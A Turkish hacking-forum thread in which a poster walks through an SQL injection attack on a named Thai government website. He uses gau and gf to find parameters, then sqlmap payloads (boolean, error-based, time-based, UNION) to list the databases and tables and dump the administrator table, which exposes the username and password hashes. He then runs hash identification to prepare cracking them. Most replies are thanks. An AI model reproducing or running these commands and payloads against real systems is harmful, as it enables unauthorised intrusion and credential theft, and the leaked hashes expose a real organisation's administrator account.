Dump .go.th SQLi ve Dump | Nasıl Yaptım Adım Adım! (1 Viewer)

ACE Veen · Kas 1, 2025

Konuda açığı nasıl bulduğumu da anlatıcam ondan hideliyorum

Revealed content

Kod:

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# echo https://www.wiangcs.go.th/ | gau --mc 200 | tee url.txt

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# cat url.txt | gf sqli | tee sqli.txt

Bundan sonra sqli.txt'deki urllere baktım ve status code 200 verenlerdeki id'lerin sonuna bi' tırnak attım ve SQL syntax hatası aldım

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=download_main&type=21&id=89 AND 6113=6113

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=download_main&type=21&id=89 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x716b766a71,(SELECT (ELT(9266=9266,1))),0x717a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=download_main&type=21&id=89 AND (SELECT 1137 FROM (SELECT(SLEEP(5)))QbUU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: page=download_main&type=21&id=89 UNION ALL SELECT CONCAT(0x716b766a71,0x6f5166706c564a68597853486c47704c6b755670774a544353796a696648626b534e484a6d757172,0x717a786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

available databases [2]:
[*] information_schema
[*] wiangcs_db2021

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id -D wiangcs_db2021 --tables

Database: wiangcs_db2021
[51 tables]
+----------------------+
| tb_administor        |
| tb_banner            |
| tb_banner_type       |
| tb_comment           |
| tb_contact           |
| tb_download_file     |
| tb_download_last     |
| tb_download_main     |
| tb_download_sub      |
| tb_download_type     |
| tb_egp               |
| tb_gallery           |
| tb_gallery_images    |
| tb_gallery_type      |
| tb_hotline           |
| tb_hotline_mail      |
| tb_information_file  |
| tb_information_last  |
| tb_information_main  |
| tb_information_sub   |
| tb_information_type  |
| tb_inner_doc         |
| tb_intro             |
| tb_ita               |
| tb_ita_file          |
| tb_ita_main          |
| tb_ita_sub           |
| tb_ita_type          |
| tb_letter_news       |
| tb_letter_news_type  |
| tb_main_menu         |
| tb_news              |
| tb_news_images       |
| tb_news_type         |
| tb_personnel         |
| tb_personnel_index   |
| tb_personnel_type    |
| tb_poll              |
| tb_polls             |
| tb_polls_choice      |
| tb_polls_vote        |
| tb_refcounters       |
| tb_report            |
| tb_sliders           |
| tb_sliders_type      |
| tb_sped_photo        |
| tb_sped_photo_status |
| tb_youtube           |
| tbl_egp              |
| tbl_egp_category     |
| user_online          |
+----------------------+

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id -D wiangcs_db2021 -T tb_administor --columns --dump

Database: wiangcs_db2021
Table: tb_administor
[4 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| date_change | datetime    |
| id          | int(11)     |
| pwd         | varchar(50) |
| usr         | varchar(50) |
+-------------+-------------+

Database: wiangcs_db2021
Table: tb_administor
[1 entry]
+----+----------------------------------+----------------------------------+---------------------+
| id | pwd                              | usr                              | date_change         |
+----+----------------------------------+----------------------------------+---------------------+
| 1  | 146038752b1263aea488bc39b6948d21 | aff28bb66d33a51728df17973e7e70a5 | 0000-00-00 00:00:00 |
+----+----------------------------------+----------------------------------+---------------------+

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# nth -t 146038752b1263aea488bc39b6948d21

  _   _                           _____ _           _          _   _           _
| \ | |                         |_   _| |         | |        | | | |         | |
|  \| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______|  _  |/ _` / __| '_ \
| |\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___|      \_/ |_| |_|\__,_|\__|      \_| |_/\__,_|___/_| |_|

https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash


146038752b1263aea488bc39b6948d21

Most Likely
MD5, HC: 0 JtR: raw-md5 Summary: Used for Linux Shadow files.
MD4, HC: 900 JtR: raw-md4
NTLM, HC: 1000 JtR: nt Summary: Often used in Windows Active Directory.
Domain Cached Credentials, HC: 1100 JtR: mscach

Least Likely
Domain Cached Credentials 2, HC: 2100 JtR: mscach2 Double MD5, HC: 2600  Tiger-128,  Skein-256(128),  Skein-512(128),
Lotus Notes/Domino 5, HC: 8600 JtR: lotus5 md5(md5(md5($pass))), HC: 3500 Summary: Hashcat mode is only supported in
hashcat-legacy. md5(uppercase(md5($pass))), HC: 4300  md5(sha1($pass)), HC: 4400  md5(utf16($pass)), JtR: dynamic_29
md4(utf16($pass)), JtR: dynamic_33 md5(md4($pass)), JtR: dynamic_34 Haval-128, JtR: haval-128-4 RIPEMD-128, JtR:
ripemd-128 MD2, JtR: md2 Snefru-128, JtR: snefru-128 DNSSEC(NSEC3), HC: 8300  RAdmin v2.x, HC: 9900 JtR: radmin Cisco
Type 7,  BigCrypt, JtR: bigcrypt

┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# nth --text aff28bb66d33a51728df17973e7e70a5

  _   _                           _____ _           _          _   _           _
| \ | |                         |_   _| |         | |        | | | |         | |
|  \| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______|  _  |/ _` / __| '_ \
| |\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___|      \_/ |_| |_|\__,_|\__|      \_| |_/\__,_|___/_| |_|

https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash


aff28bb66d33a51728df17973e7e70a5

Most Likely
MD5, HC: 0 JtR: raw-md5 Summary: Used for Linux Shadow files.
MD4, HC: 900 JtR: raw-md4
NTLM, HC: 1000 JtR: nt Summary: Often used in Windows Active Directory.
Domain Cached Credentials, HC: 1100 JtR: mscach

Least Likely
Domain Cached Credentials 2, HC: 2100 JtR: mscach2 Double MD5, HC: 2600  Tiger-128,  Skein-256(128),  Skein-512(128),
Lotus Notes/Domino 5, HC: 8600 JtR: lotus5 md5(md5(md5($pass))), HC: 3500 Summary: Hashcat mode is only supported in
hashcat-legacy. md5(uppercase(md5($pass))), HC: 4300  md5(sha1($pass)), HC: 4400  md5(utf16($pass)), JtR: dynamic_29
md4(utf16($pass)), JtR: dynamic_33 md5(md4($pass)), JtR: dynamic_34 Haval-128, JtR: haval-128-4 RIPEMD-128, JtR:
ripemd-128 MD2, JtR: md2 Snefru-128, JtR: snefru-128

Bu şekilde yaptım 3 dk falan sürdü

lryxn · Kas 1, 2025

teşekkürler..

3v0m1nd · Kas 1, 2025

Eline sağlık

patron00315269 · Kas 3, 2025

bakalım

chechnyafsbc · Kas 4, 2025

gwt this rather!

warezct · Kas 4, 2025

bakalım

MrGentelman · Kas 4, 2025

dinliyoruz

xsssda · Kas 8, 2025

eyvallah

Merkuriya · Kas 8, 2025

ellerine sağlık

shodaiw · Kas 8, 2025

teşekkür ederiz

problematicsquare · Kas 9, 2025

helall

akrep · Kas 20, 2025

bakalım

newholland06 · Ocak 2, 2026

bakalım eline sağlık

Üye silindi 29865 · Ocak 2, 2026

Hopefully its fresh and works! Thank you!

ede10 · Ocak 3, 2026

eyw

HackerXsploit · Ocak 4, 2026

Eline sağlık

szbeg · Ocak 17, 2026

Merak etttimm

lucifer4x4 · Ocak 17, 2026

s

osas84 · Ocak 20, 2026

Şsşsşs

jrper313@# · Ocak 20, 2026

es

Dump .go.th SQLi ve Dump | Nasıl Yaptım Adım Adım! (1 Viewer)

Bu konuyu görüntüleyen kullanıcılar